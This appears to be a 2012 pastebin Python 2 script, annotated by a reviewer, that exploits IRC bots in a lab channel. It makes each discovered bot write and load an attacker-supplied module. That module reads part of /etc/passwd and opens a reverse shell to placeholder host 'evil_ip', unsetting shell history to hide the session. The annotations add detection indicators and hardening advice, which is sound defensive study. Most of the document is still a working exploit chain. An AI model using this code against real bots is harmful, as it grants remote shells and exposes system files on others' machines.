
Untitled

a guest Aug 6th, 2012 250 Never
  1. from socket import *
  2. from time import sleep
  3. import re
  4. from random import sample
  5.  
  # Reviewer annotation: target settings. The script logs in to an IRC server at
  # an RFC 1918 (private) address on port 6667 and works in the channel named
  # below.
  6. username = 'exploit'
  7. server = '172.16.72.128'
  8. port = 6667
  # Address family for the IRC socket. The trailing "#6" is an existing comment,
  # presumably a reminder that AF_INET6 is the alternative (confirm).
  9. server_ver = AF_INET#6
  10. channel = 'eip'
  11.  
  # Two random 7-letter names (sample() draws without repeats): one for the
  # module file, one for the function defined inside it. For defenders this
  # means the file name is not a stable indicator; the directory part of
  # service_path is the fixed element.
  12. module_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  13. service_path = '/root/.services_trololololoooo/torqux/' + module_name + '.py'
  14. func_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  # Callback endpoint used inside the payload text. 'evil_ip' is a placeholder,
  # not an address. The port is a string because it is concatenated into the
  # payload, where it ends up as an unquoted integer literal; backconnect_ver is
  # pasted in as the socket address-family constant name.
  15. backconnect_host = 'evil_ip'
  16. backconnect_port = '1165'
  17. backconnect_ver = 'AF_INET6'
  # A single line of Python source, built by concatenation. It is appended to the
  # one-line function definition sent to each bot, so it becomes part of that
  # function's body. When executed it connects a stream socket to host:port,
  # dup2()s the socket over fds 0/1/2, removes HISTFILE and HISTFILESIZE from
  # the environment, forks, and runs /bin/sh under a pty in the child.
  # Detection notes: shell history will not record the session because HISTFILE
  # is unset, so rely on process and network telemetry instead: a /bin/sh child
  # of the bot process, a process whose stdin/stdout/stderr are one socket, and
  # an unexpected outbound TCP connection from the bot host.
  18. payload = 'import sys ; import os;import socket;import pty;shell = "/bin/sh";host = "' + backconnect_host + '";port = ' + backconnect_port + ';s = socket.socket(socket.' + backconnect_ver + ',socket.SOCK_STREAM);s.connect((host, port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv("HISTFILE");os.unsetenv("HISTFILESIZE");pid = os.fork();pid or pty.spawn(shell); s.close()'
  19.  
  # Reviewer annotation: script entry point. This is Python 2 code (print
  # statements, str passed straight to socket.send). It registers on the IRC
  # server, identifies bots in the channel, then sends each bot a fixed sequence
  # of private messages. The bot's side of those commands is not on this page.
  20. if __name__ == '__main__':
  21.     s = socket(server_ver, SOCK_STREAM)
  22.     s.connect((server, port))
          # Plain IRC registration (NICK, USER), a fixed 10 s wait, then JOIN.
  23.     s.send('NICK ' + username +'\r\n')
  24.     s.send('USER '+ (username + ' ')*3 + ':Python IRC\r\n')
  25.     sleep(10)
  26.     s.send('JOIN #' + channel + '\r\n')
          # Drain server output until the end-of-MOTD text has been seen.
  27.     res = ''
  28.     while 'End of MOTD command' not in res:
  29.         res += s.recv(100500)
          # Bot discovery: "!d" is sent to the channel and, after 4 s, a single
          # recv() is parsed. Any line whose IRC prefix is ":nick!..." and that
          # contains " rolls" contributes its nick to the bot list.
  30.     s.send('PRIVMSG #' + channel + ' :!d\r\n')
  31.     sleep(4)
  32.     res1 = s.recv(100500)
  33.     #print res1
  34.     bots = []
  35.     for l in res1.splitlines():
  36.         nicks = re.findall(r'^:([^!]+)!.*? rolls', l)
  37.         if nicks:
  38.             bots.append(nicks[0])
  39.     print 'Found bots:', bots
  40.  
          # Per bot: six private messages, one second apart. The "!messages" line
          # carries service_path followed by a one-line function definition whose
          # body sends the first 100 characters of /etc/passwd through a.sendLns
          # and then runs the payload statements. "!_addit" is given module_name,
          # "!reload" takes no argument, and the last message is "!" + func_name.
          # NOTE(review): judging by the arguments only, "!messages" appears to
          # make the bot write that text to service_path, and "!_addit"/"!reload"
          # to register and load it as a module - confirm against the bot source.
          # Defensive reading: the script supplies no credential, so the bot
          # appears to act on these commands for any user who can message it,
          # and the path under /root suggests it runs as root (both to confirm).
          # Hardening follows from that: authenticate command senders, keep
          # file-writing and module-loading commands off the chat interface, run
          # the bot as an unprivileged user, and restrict its outbound
          # connections. Indicators on this page: a PRIVMSG whose "!messages"
          # argument is a filesystem path, and new .py files appearing in the
          # bot's service directory.
  41.     for bot in bots:
  42.         #bot = '#eip'
  43.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  44.         sleep(1)
  45.         s.send('PRIVMSG ' + bot + ' :!messages ' + service_path + ' ' + 'def ' + func_name + '(a,b,c,d): a.sendLns(c, open("/etc/passwd").read()[0:100]); ' + payload + '\r\n')
  46.         sleep(1)
  47.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  48.         sleep(1)
  49.         s.send('PRIVMSG ' + bot + ' :!_addit ' + module_name + '\r\n')
  50.         sleep(1)
  51.         s.send('PRIVMSG ' + bot + ' :!reload\r\n')
  52.         sleep(1)
  53.         s.send('PRIVMSG ' + bot + ' :!' + func_name + '\r\n')
  54.         sleep(1)
  55.  
          # If at least one bot was found, print whatever the server sent back
          # (this is where the /etc/passwd excerpt would show up), then close.
  56.     if bots:
  57.         sleep(1)
  58.         print s.recv(100500)
  59.     s.close()